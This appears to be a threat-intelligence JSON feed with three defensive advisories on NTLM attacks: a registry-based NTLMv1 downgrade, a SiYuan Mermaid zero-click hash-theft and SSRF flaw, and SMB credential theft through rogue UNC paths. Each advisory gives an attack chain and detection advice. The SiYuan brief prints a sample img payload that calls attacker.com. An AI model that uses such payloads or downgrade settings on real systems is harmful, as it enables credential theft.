{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/ntlm/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","Elastic Endgame"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","ntlm","registry-modification","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis rule detects a specific defense evasion technique where an attacker modifies the Windows registry to force a system to use the less secure NTLMv1 authentication protocol. This is known as a NetNTLMv1 downgrade attack. The registry modification involves changing the \u003ccode\u003eLmCompatibilityLevel\u003c/code\u003e value, which controls the authentication level. Attackers with local administrator privileges can perform this modification to weaken the authentication mechanism, making it easier to intercept and crack credentials. The rule is designed to detect this activity by monitoring registry events from various sources, including Elastic Defend, Microsoft Defender XDR, SentinelOne Cloud Funnel, Sysmon, and Crowdstrike. 
It is important to monitor for this activity as it can lead to credential theft and further compromise of the system.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains local administrator privileges on a Windows system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a registry editor or command-line tool (e.g., \u003ccode\u003ereg.exe\u003c/code\u003e, PowerShell) to modify the \u003ccode\u003eLmCompatibilityLevel\u003c/code\u003e value in the registry.\u003c/li\u003e\n\u003cli\u003eThe attacker navigates to one of the following registry paths: \u003ccode\u003eHKLM\\System\\CurrentControlSet\\Control\\Lsa\\LmCompatibilityLevel\u003c/code\u003e or \u003ccode\u003eHKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker sets the \u003ccode\u003eLmCompatibilityLevel\u003c/code\u003e value to \u0026ldquo;0\u0026rdquo;, \u0026ldquo;1\u0026rdquo;, or \u0026ldquo;2\u0026rdquo; (or their hexadecimal equivalents \u0026ldquo;0x00000000\u0026rdquo;, \u0026ldquo;0x00000001\u0026rdquo;, \u0026ldquo;0x00000002\u0026rdquo;). 
These values force the system to use NTLMv1.\u003c/li\u003e\n\u003cli\u003eThe system now uses NTLMv1 for authentication attempts.\u003c/li\u003e\n\u003cli\u003eThe attacker initiates a man-in-the-middle attack to capture NTLMv1 authentication traffic using tools like Responder or Inveigh.\u003c/li\u003e\n\u003cli\u003eThe captured NTLMv1 hashes are cracked using brute-force or dictionary attacks, revealing the user\u0026rsquo;s credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised credentials to gain unauthorized access to network resources or other systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful NetNTLMv1 downgrade attack can lead to the compromise of user credentials, enabling attackers to move laterally within the network, access sensitive data, and potentially escalate privileges. The impact can range from data breaches to complete system compromise, depending on the attacker\u0026rsquo;s objectives and the compromised user\u0026rsquo;s privileges.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Potential NetNTLMv1 Downgrade Attack\u0026rdquo; to detect registry modifications setting \u003ccode\u003eLmCompatibilityLevel\u003c/code\u003e to insecure values (0, 1, 2) within the specified registry paths.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon registry event logging to ensure the necessary data is available for the Sigma rule to function correctly.\u003c/li\u003e\n\u003cli\u003eReview registry event logs for unauthorized modifications of \u003ccode\u003eLmCompatibilityLevel\u003c/code\u003e to confirm legitimate administrative actions.\u003c/li\u003e\n\u003cli\u003eImplement strict access control policies to limit local administrator privileges and reduce the attack surface.\u003c/li\u003e\n\u003cli\u003eMonitor the references URL for updates on recommended security 
configurations related to NTLM authentication.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2026-05-netntlmv1-downgrade/","summary":"This brief details a registry modification attack that downgrades the system to NTLMv1 authentication, enabling NetNTLMv1 downgrade attacks, typically performed with local administrator privileges on Windows systems.","title":"Potential NetNTLMv1 Downgrade Attack via Registry Modification","url":"https://feed.craftedsignal.io/briefs/2026-05-netntlmv1-downgrade/"},{"_cs_actors":[],"_cs_cves":[{"id":"CVE-2026-40107"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["siyuan","ntlm","ssrf","credential-theft","mermaid"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSiYuan, a note-taking application, is vulnerable to a zero-click NTLM hash theft and blind SSRF exploit due to insecure configuration of Mermaid.js. The application configures Mermaid.js with \u003ccode\u003esecurityLevel: \u0026quot;loose\u0026quot;\u003c/code\u003e and \u003ccode\u003ehtmlLabels: true\u003c/code\u003e, which allows \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tags with \u003ccode\u003esrc\u003c/code\u003e attributes to bypass sanitization and be injected into SVG \u003ccode\u003e\u0026lt;foreignObject\u0026gt;\u003c/code\u003e blocks. When a user opens a note containing a malicious Mermaid diagram with a protocol-relative URL (e.g., \u003ccode\u003e//attacker.com/image.png\u003c/code\u003e), the Electron client fetches the URL. On Windows, this resolves as a UNC path, triggering SMB authentication and sending the victim\u0026rsquo;s NTLMv2 hash to the attacker. On macOS and Linux, the same diagram triggers an HTTP request to the attacker\u0026rsquo;s server, exfiltrating the victim\u0026rsquo;s IP address. The vulnerability affects SiYuan versions prior to the fix implemented after April 7, 2026. 
This allows for credential theft without any user interaction beyond opening a note.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious SiYuan note containing a Mermaid diagram with a protocol-relative URL within an \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag, such as \u003ccode\u003e\u0026lt;img src='//attacker.com/share/img.png'\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the malicious note (e.g., via sharing or a crafted .sy export).\u003c/li\u003e\n\u003cli\u003eThe victim opens the note in SiYuan.\u003c/li\u003e\n\u003cli\u003eSiYuan renders the Mermaid diagram using the insecure Mermaid.js configuration.\u003c/li\u003e\n\u003cli\u003eThe SVG containing the malicious \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag is injected into the DOM via \u003ccode\u003einnerHTML\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Electron client attempts to fetch the resource at the protocol-relative URL.\u003c/li\u003e\n\u003cli\u003eOn Windows, the protocol-relative URL resolves to a UNC path (\u003ccode\u003e\\\\attacker.com\\share\\img.png\u003c/code\u003e), initiating an SMB connection.\u003c/li\u003e\n\u003cli\u003eWindows automatically sends the victim\u0026rsquo;s NTLMv2 hash to the attacker\u0026rsquo;s SMB server; on other platforms, the client instead makes an HTTP request that leaks the victim\u0026rsquo;s IP address.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerability allows for zero-click NTLMv2 hash theft on Windows systems, where the victim only needs to open a note containing the malicious Mermaid diagram. The stolen NTLMv2 hashes can be cracked offline or used in relay attacks to gain unauthorized access to the victim\u0026rsquo;s resources. 
On all platforms, this vulnerability can be exploited to perform blind SSRF and leak the victim\u0026rsquo;s IP address, acting as a tracking pixel to confirm when the note was opened. This affects all SiYuan users who receive a crafted note.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid NTLM Theft Attempt\u003c/code\u003e to identify SMB traffic originating from SiYuan processes attempting to connect to external IPs (network_connection log source).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid SSRF Attempt\u003c/code\u003e to detect HTTP requests from SiYuan to external IP addresses with a suspicious URL (network_connection log source).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for SMB connections originating from SiYuan, especially to unusual or external destinations (network_connection log source).\u003c/li\u003e\n\u003cli\u003eBlock the attacker\u0026rsquo;s domain (\u003ccode\u003eattacker.com\u003c/code\u003e) at the DNS resolver, as observed in the malicious Mermaid diagram example (iocs).\u003c/li\u003e\n\u003cli\u003eUpgrade SiYuan to a patched version that addresses CVE-2026-40107 to mitigate the underlying vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-11T12:00:00Z","date_published":"2026-04-11T12:00:00Z","id":"/briefs/2026-04-siyuan-ntlm-ssrf/","summary":"SiYuan is vulnerable to zero-click NTLM hash theft on Windows and blind SSRF on all platforms due to insecure Mermaid.js configuration, where a malicious Mermaid diagram containing a protocol-relative URL can be injected into a note, causing the Electron client to fetch the URL, triggering SMB authentication on Windows and sending the victim's NTLMv2 hash to the attacker. 
On macOS and Linux, the request acts as a tracking pixel and blind SSRF.","title":"SiYuan Zero-Click NTLM Theft and Blind SSRF via Mermaid Diagrams","url":"https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["exfiltration","credential-access","windows","smb","ntlm"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThis detection strategy focuses on identifying unusual Server Message Block (SMB) traffic that originates from internal IP addresses and connects to external networks. The SMB protocol, commonly used for file and printer sharing within a network, can be exploited to exfiltrate data by injecting rogue UNC paths to capture NTLM credentials. This activity is often associated with threat actors attempting to steal credentials for lateral movement or data exfiltration. Defenders should be aware of this technique as it allows adversaries to bypass traditional security controls by leveraging a legitimate protocol for malicious purposes. This detection is relevant for environments utilizing Windows operating systems and SMB for internal network communications. 
The goal is to identify and alert on SMB connections to external IPs, excluding known safe ranges and legitimate business applications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker compromises an internal system via phishing or other means (not detailed in source).\u003c/li\u003e\n\u003cli\u003eThe attacker injects a rogue UNC path into a document, email, or other medium.\u003c/li\u003e\n\u003cli\u003eA user opens the malicious document or clicks the injected link, triggering an SMB connection to a malicious external server.\u003c/li\u003e\n\u003cli\u003eThe SMB connection attempts to authenticate with the user\u0026rsquo;s NTLM credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker captures the NTLM hash from the authentication attempt.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to crack the NTLM hash to obtain the user\u0026rsquo;s password.\u003c/li\u003e\n\u003cli\u003eUsing the cracked password, the attacker gains unauthorized access to other systems and resources on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to credential theft, allowing attackers to gain unauthorized access to sensitive data and systems within the organization. This can result in data breaches, financial losses, and reputational damage. The impact is significant because SMB is a common protocol within many Windows environments, making this technique highly effective if not properly monitored.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect SMB Connection to External IP\u0026rdquo; to your SIEM to identify potentially malicious SMB connections to the internet. 
Tune the rule by excluding known good external IPs used by legitimate services.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 3 (Network Connection) with proper filtering to capture SMB traffic details as recommended in the linked setup guide, to enhance the fidelity of the detection.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to restrict SMB traffic to only necessary internal communications, reducing the attack surface and mitigating the risk of external exposure.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-25T12:00:00Z","date_published":"2024-01-25T12:00:00Z","id":"/briefs/2024-01-rare-smb-exfiltration/","summary":"This brief details a detection strategy for rare SMB connections originating from internal networks to the internet, potentially indicating NTLM credential theft via rogue UNC path injection.","title":"Detecting Rare SMB Connections for Potential NTLM Credential Theft","url":"https://feed.craftedsignal.io/briefs/2024-01-rare-smb-exfiltration/"}],"language":"en","title":"CraftedSignal Threat Feed — Ntlm","version":"https://jsonfeed.org/version/1.1"}